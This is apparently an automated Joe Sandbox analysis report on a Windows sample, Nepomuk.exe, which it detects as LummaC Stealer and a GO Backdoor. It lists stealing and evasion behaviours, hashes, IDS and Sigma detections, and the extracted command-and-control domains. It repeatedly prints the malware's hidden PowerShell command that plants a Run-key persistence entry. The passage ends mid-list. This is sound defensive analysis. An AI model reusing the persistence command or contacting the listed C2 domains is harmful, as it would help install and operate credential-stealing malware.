Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nepomuk.exe

Overview

General Information

Sample name:Nepomuk.exe
Analysis ID:1663719
MD5:fac9214c35af0181c30099c68920f445
SHA1:5fe0f210c6461db77ed5b7e265b85eae57ffa6f1
SHA256:93c71027c0484c7be95f7285b2fe668b60b3bec52b0f57d0deb01fcdfe111a89
Tags:exeuser-Rony
Infos:

Detection

GO Backdoor, LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contain functionality to detect virtual machines
Contains functionality to detect sleep reduction / modifications
Contains functionality to encrypt and move a file in one function
Contains functionality to log keystrokes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Nepomuk.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Nepomuk.exe" MD5: FAC9214C35AF0181C30099C68920F445)
    • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
      • powershell.exe (PID: 4364 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 4508 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
    • powershell.exe (PID: 7316 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 1732 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
    • powershell.exe (PID: 5692 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["quantyu.bet/AOSkwi", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "3cb89e8f70940188c63e82bafa7e7cbee0b03187b6a25af18f"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1356159060.0000000003F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
      0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
        0000000A.00000002.2472321608.00000000049AC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
          00000000.00000002.1471964767.0000000001550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0000000D.00000002.2472257494.0000000004508000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Nepomuk.exe.1550000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.Nepomuk.exe.3550000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  0.2.Nepomuk.exe.1550000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe", ParentImage: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, ParentProcessId: 5852, ParentProcessName: T68WJ1SM1U30WFLN7XXTLWOX8.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", ProcessId: 4364, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe", ParentImage: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, ParentProcessId: 5852, ParentProcessName: T68WJ1SM1U30WFLN7XXTLWOX8.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", ProcessId: 4364, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-12T09:26:25.294844+020020283713Unknown Traffic192.168.2.449716104.21.42.7443TCP
                    2025-04-12T09:26:27.084877+020020283713Unknown Traffic192.168.2.449717104.21.42.7443TCP
                    2025-04-12T09:26:28.341631+020020283713Unknown Traffic192.168.2.449718104.21.42.7443TCP
                    2025-04-12T09:26:29.570168+020020283713Unknown Traffic192.168.2.449719104.21.42.7443TCP
                    2025-04-12T09:26:31.652698+020020283713Unknown Traffic192.168.2.449720104.21.42.7443TCP
                    2025-04-12T09:26:33.229489+020020283713Unknown Traffic192.168.2.449721104.21.42.7443TCP
                    2025-04-12T09:26:36.799930+020020283713Unknown Traffic192.168.2.449727104.21.42.7443TCP
                    2025-04-12T09:26:37.754261+020020283713Unknown Traffic192.168.2.449728140.82.114.3443TCP
                    2025-04-12T09:26:38.633161+020020283713Unknown Traffic192.168.2.449729185.199.111.133443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-12T09:26:25.294844+020020613961Domain Observed Used for C2 Detected192.168.2.449716104.21.42.7443TCP
                    2025-04-12T09:26:27.084877+020020613961Domain Observed Used for C2 Detected192.168.2.449717104.21.42.7443TCP
                    2025-04-12T09:26:28.341631+020020613961Domain Observed Used for C2 Detected192.168.2.449718104.21.42.7443TCP
                    2025-04-12T09:26:29.570168+020020613961Domain Observed Used for C2 Detected192.168.2.449719104.21.42.7443TCP
                    2025-04-12T09:26:31.652698+020020613961Domain Observed Used for C2 Detected192.168.2.449720104.21.42.7443TCP
                    2025-04-12T09:26:33.229489+020020613961Domain Observed Used for C2 Detected192.168.2.449721104.21.42.7443TCP
                    2025-04-12T09:26:36.799930+020020613961Domain Observed Used for C2 Detected192.168.2.449727104.21.42.7443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-12T09:26:24.859642+020020613951Domain Observed Used for C2 Detected192.168.2.4496661.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-12T09:26:24.734313+020020613931Domain Observed Used for C2 Detected192.168.2.4579341.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-12T09:26:39.185271+020028225371Attempted User Privilege Gain185.199.111.133443192.168.2.449729TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://changeaie.top/gepslite5Avira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepsohAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepsOAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepsZAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepsCO.Avira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepse0RAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/gepsjAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/geps5Avira URL Cloud: Label: malware
                    Source: quantyu.bet/AOSkwiAvira URL Cloud: Label: malware
                    Source: https://changeaie.top/nAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackMalware Configuration Extractor: LummaC {"C2 url": ["quantyu.bet/AOSkwi", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "3cb89e8f70940188c63e82bafa7e7cbee0b03187b6a25af18f"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exeReversingLabs: Detection: 25%
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeReversingLabs: Detection: 25%
                    Multi AV Scanner detection for submitted file
                    Source: Nepomuk.exeVirustotal: Detection: 48%Perma Link
                    Source: Nepomuk.exeReversingLabs: Detection: 52%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleNeural Call Log Analysis: 92.9%
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: quantyu.bet/AOSkwi
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: soursopsf.run/gsoiao
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: changeaie.top/geps
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: easyupgw.live/eosz
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: liftally.top/xasj
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: upmodini.digital/gokk
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: salaccgfa.top/gsooz
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: zestmodp.top/zeda
                    Source: 0.2.Nepomuk.exe.3550000.2.unpackString decryptor: xcelmodo.run/nahd
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356ABFA CryptUnprotectData,CryptUnprotectData,0_2_0356ABFA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A1DB CryptUnprotectData,0_2_0356A1DB

                    Compliance

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\Nepomuk.exeUnpacked PE file: 0.2.Nepomuk.exe.3550000.2.unpack
                    Source: Nepomuk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.4:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49729 version: TLS 1.2
                    Source: Nepomuk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,Re